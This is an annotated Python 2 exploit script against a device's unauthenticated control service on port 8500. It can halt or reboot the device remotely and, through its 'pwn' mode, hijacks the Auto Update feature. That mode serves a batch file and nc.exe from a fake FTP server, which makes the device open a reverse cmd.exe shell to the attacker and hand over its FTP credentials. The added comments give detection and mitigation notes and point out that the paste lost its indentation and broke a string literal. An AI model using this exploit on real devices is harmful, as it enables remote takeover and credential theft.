  1. #!/usr/bin/env python2
  2. # -*- coding: utf-8 -*-
  3.  
  4. import sys
  5. import struct
  6. import time
  7. import socket
  8. from threading import Thread
  9.  
  10. #
  11. # Change this IP to your public IP address.
  12. #
# PUBLIC_IP is the address the target is told to connect back to: it is
# embedded in the batch file built in fake_ftpd.__init__ and in the UPDATE
# payload built in do_stuff.  Defender note: a device that opens outbound
# sessions to an address carried in an unauthenticated control packet is
# the weakness this script depends on; pin the update origin and filter
# the device's egress to remove it.
  13. PUBLIC_IP = "192.168.0.1"
  14.  
  15. #
  16. # Don't forget to open ports 21 and 8501 in your
  17. # OpenOffice.org firewall
  18. #
# SRV_PORT: the target's control service that do_stuff connects to.
# FTP_PORT: the local port fake_ftpd.run binds (the target fetches from it).
# SHELL_PORT: the local port do_stuff listens on for the callback connection.
  19. SRV_PORT = 8500
  20. FTP_PORT = 21
  21. SHELL_PORT = 8501
  22.  
# Wire format of the control protocol as used below: every request starts
# with the 4-byte MAGIC header followed by a command code (HALT, REBOOT,
# STOP, or UPDATE plus an address/port payload).  OK is the single reply
# byte the script expects after STOP and UPDATE; HALT and REBOOT are sent
# without reading any reply.  Detection note: the fixed MAGIC prefix on
# TCP/8500 is a usable network signature, and no authentication exchange
# takes place before a command is sent.
  23. MAGIC = "\x15\x66\x00\x78"
  24. HALT = "\x65"
  25. REBOOT = "\x66"
  26. STOP = "\x70\x00\x00"
  27. UPDATE = "\x82"
  28. OK = "\x01"
  29.  
# Print an optional error line, then the usage text, then exit.
# msg: error message printed before the usage banner (None = no error).
# Note: the exit status is 0 even when called for an error, so a caller
# cannot tell a usage failure from a deliberate help request.
  30. def usage (msg = None):
  31.  
  32. if msg: print "Error: %s\n" % msg
  33.  
  34. print "Usage: %s IP command" % sys.argv[0]
  35. print
  36. print "commands:"
  37. print "- halt shutdown the server"
  38. print "- reboot reboot the server"
  39. print "- stop stop P2P clients (eMule and Shareaza)"
# NOTE(review): the next string literal is split over two lines in this
# paste (no line continuation, no closing quote on the first line), so as
# shown it is a syntax error; the file's indentation is lost as well.
  40. print "- pwn use a vulnerability in the Auto Update feature to
  41. get a remote shell"
  42.  
  43. sys.exit(0)
  44.  
# Minimal single-client FTP server run on a daemon thread.  It exists only
# to answer the target's Auto Update fetch with two prepared files: a batch
# file and a copy of ./nc.exe read from the current directory.
#
# Defender notes (what this looks like from the target's side):
#   - the device opens an outbound FTP session to PUBLIC_IP:FTP_PORT, sends
#     USER/PASS (logged here in clear text), then retrieves
#     'script/script_diff2/execute_update.bat' and
#     'script/script_diff2/cmd_execute_update_cmd_file.txt';
#   - the batch renames the .txt to nc.exe and runs it with '-e cmd.exe'
#     towards PUBLIC_IP:SHELL_PORT, i.e. a second outbound connection.
#   An update mechanism that only accepts signed packages from a fixed,
#   authenticated origin, plus egress filtering on the device, stops both.
  45. class fake_ftpd(Thread):
  46.  
# Read ./nc.exe and build the batch script; no network activity here.
# Raises IOError (Python 2) if ./nc.exe is not present in the cwd.
  47. def __init__ (self):
  48. Thread.__init__(self)
  49. self.s = None
  50. f = open('./nc.exe', 'rb')
  51. nc = f.read()
  52. f.close()
  53. batch = "@echo off\r\n"
  54. batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
  55. batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
# Map of the exact paths the peer may RETR to the bytes served for them.
  56. self.files = {
  57. 'script/script_diff2/execute_update.bat': batch,
  58. 'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
  59. }
  60.  
# Thread body: bind FTP_PORT on all interfaces, serve exactly one client,
# then return.  Only active-mode transfers (PORT) are implemented.
  61. def run (self):
  62. self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63. self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  64. self.s.bind(("", FTP_PORT))
# The second listen() only replaces the backlog set by the first; one of
# the two calls is redundant.
  65. self.s.listen(1)
  66. self.s.listen(0x1337)
  67. print "[+] Waiting for FTP connection..."
  68.  
# accept() blocks with no timeout and is called once: a single session.
  69. conn, addr = self.s.accept()
  70.  
  71. print "[!] FTP - %s connected!" % addr[0]
  72. conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
  73.  
# Command loop; an empty recv() (peer closed) ends the session.
  74. while True:
  75. data = conn.recv(1024)
  76. if not data:
  77. break
  78.  
# Split on single spaces only; multi-space or quoted arguments are not handled.
  79. args = data.rstrip().split(' ')
  80.  
  81. if data.startswith('CWD'):
  82. conn.send('250 CWD command successful.\r\n')
  83.  
  84. elif data.startswith('TYPE'):
  85. conn.send('200 TYPE set.\r\n')
  86.  
# 'username' is bound here and read in the PASS branch; a PASS arriving
# before USER would raise NameError in this thread.
  87. elif data.startswith('USER'):
  88. conn.send('331 Password required.\r\n')
  89. username = data.split(' ')[1].rstrip()
  90.  
  91. elif data.startswith('PASS'):
  92. conn.send('230 User logged in.\r\n')
  93. password = data.split(' ')[1].rstrip()
# Any credentials the device presents are printed in clear text.
  94. print "[!] TMG credentials: %s/%s" % (username, password)
  95.  
# Active mode: this server connects out to the address/port the peer
# supplies (h1,h2,h3,h4,p1,p2).  'sdata' exists only after this branch has
# run, so a RETR or NLST before PORT would raise NameError.
  96. elif data.startswith('PORT'):
  97. arg = args[1].split(',')
  98. ip = '.'.join(arg[:4])
  99. port = int(arg[4]) * 256 + int(arg[5])
  100. sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  101. sdata.connect((ip, port))
  102. conn.send('200 PORT command successful.\r\n')
  103.  
# Serve by exact path.  An unknown path is answered with the literal text
# 'file not found\r\n' as the file body and a 226 success code, not an
# FTP error reply.
  104. elif data.startswith('RETR'):
  105. conn.send('150 Opening BINARY mode data connection\r\n')
  106. buf = self.files.get(args[1], 'file not found\r\n')
  107. sdata.send(buf)
  108. sdata.close()
  109. conn.send('226 Transfer complete\r\n')
  110. print "[+] File \"%s\" transfered..." % args[1]
  111.  
# NLST echoes its argument (or an empty line) rather than listing
# self.files.
  112. elif data.startswith('NLST'):
  113. conn.send('150 Here comes the directory listing.\r\n')
  114. if len(args) == 1:
  115. listing = ''
  116. else:
  117. listing = args[1]
  118. sdata.send(listing + '\r\n')
  119. sdata.close()
  120. conn.send('226 Directory send OK.\r\n')
  121.  
  122. elif data.startswith('QUIT'):
  123. conn.send('221 Goodbye.\r\n')
  124. break
  125.  
  126. else:
  127. conn.send('500 Unknown command.\r\n')
  128.  
# Control connection closed on QUIT or EOF; the listening socket self.s
# is left open.
  129. conn.close()
  130.  
  131.  
# Connect to host:SRV_PORT and issue one control command.
# host: target address (not validated here).
# cmd: one of 'halt', 'reboot', 'stop', 'pwn' (checked by the caller).
# Returns None in every case; a failed connect is reported and swallowed.
# 'pwn' additionally starts fake_ftpd and then blocks in an interactive
# loop until the user types quit/exit.
  132. def do_stuff (host, cmd):
  133.  
  134. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5 s timeout applies to connect() and every recv() on s below.
  135. s.settimeout(5)
  136.  
  137. try:
  138. print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
  139. s.connect((host, SRV_PORT))
  140.  
# Python 2 except syntax; the stray ';' after return is harmless.
  141. except Exception, e:
  142. print("[?] Error: %s" % e)
  143. s.close()
  144. return ;
  145.  
  146. print "[+] Sending evil packet..."
  147.  
# HALT and REBOOT are fire-and-forget: no reply is read.
  148. if cmd == 'halt':
  149. s.send(MAGIC + HALT)
  150. print "[!] Done!"
  151.  
  152. elif cmd == 'reboot':
  153. s.send(MAGIC + REBOOT)
  154. print "[!] Done!"
  155.  
# STOP expects a one-byte reply; data[0] is a 1-char str in Python 2, so
# the comparison with OK works (it would not on Python 3 bytes).
  156. elif cmd == 'stop':
  157. s.send(MAGIC + STOP)
  158. data = s.recv(1)
  159.  
  160. if data and data[0] == OK:
  161. print "[!] Done!"
  162. else:
  163. print "[!] Error :("
  164.  
# Daemon thread: the process will not wait for the FTP server at exit.
  165. elif cmd == 'pwn':
  166. ftpd = fake_ftpd()
  167. ftpd.daemon = True
  168. ftpd.start()
  169.  
# UPDATE payload: 4-byte IPv4 address, then ntohs(FTP_PORT) packed with
# struct "h" (native byte order and size), then two zero bytes.  The
# statement is wrapped over two lines in this paste.  Defender note: the
# update source is fully attacker-chosen in this packet, which is what an
# authenticated/pinned update origin would prevent.
  170. command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
  171. socket.ntohs(FTP_PORT)) + "\x00\x00"
  172. s.send(MAGIC + UPDATE + command)
  173. data = s.recv(1)
  174.  
  175. if data and data[0] == OK:
# Callback listener on all interfaces; accept() blocks with no timeout.
  176. s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  177. s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  178. s2.bind(("", SHELL_PORT))
  179. s2.listen(1)
  180.  
  181. conn, addr = s2.accept()
  182. print "[!] SHELL - %s connected!" % addr[0]
# Print whatever the peer sends first (banner/prompt) before prompting.
  183. print conn.recv(4096)
  184.  
# Interactive loop.  'cmd' rebinds the function parameter here; that is
# safe because the parameter is not used again after this point.
  185. while True:
  186. cmd = raw_input()
  187. if cmd == "quit" or cmd == "exit":
  188. break;
  189. conn.send(cmd + "\r\n")
  190.  
# First recv blocks indefinitely; subsequent reads use a 1 s timeout to
# drain the remaining output.
  191. data = ""
  192. conn.settimeout(None)
  193. data = conn.recv(1024)
  194. conn.settimeout(1)
  195.  
# Read until the peer goes quiet (socket.timeout) or closes ("" returned).
  196. while True:
  197. line = ""
  198. try:
  199. line = conn.recv(1024)
  200. except socket.timeout:
  201. break
  202. if line == "":
  203. break
  204. data += line
  205.  
# Drops the first and last lines of the response; presumably the echoed
# command and the trailing prompt -- cannot be confirmed from here.
  206. tab = data.split("\n")
  207. print "\n".join(tab[1:-1])
  208.  
  209. conn.close()
  210. else:
  211. print "[!] Error :("
  212.  
  213. s.close()
  214.  
# Entry point: <script> IP command.
# Only '< 3' is checked, so with more than three argv entries the
# 3-tuple unpacking below raises ValueError instead of printing usage.
  215. if __name__ == '__main__':
  216.  
  217. if len(sys.argv) < 3:
  218. usage("Not enough arguments")
  219.  
  220. (_, host, cmd) = sys.argv
  221.  
# usage() exits, so do_stuff only ever receives one of these four values.
  222. if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
  223. usage('Invalid command ("%s")' % cmd)
  224.  
  225. do_stuff(host, cmd)
  226.  
  227. sys.exit(0)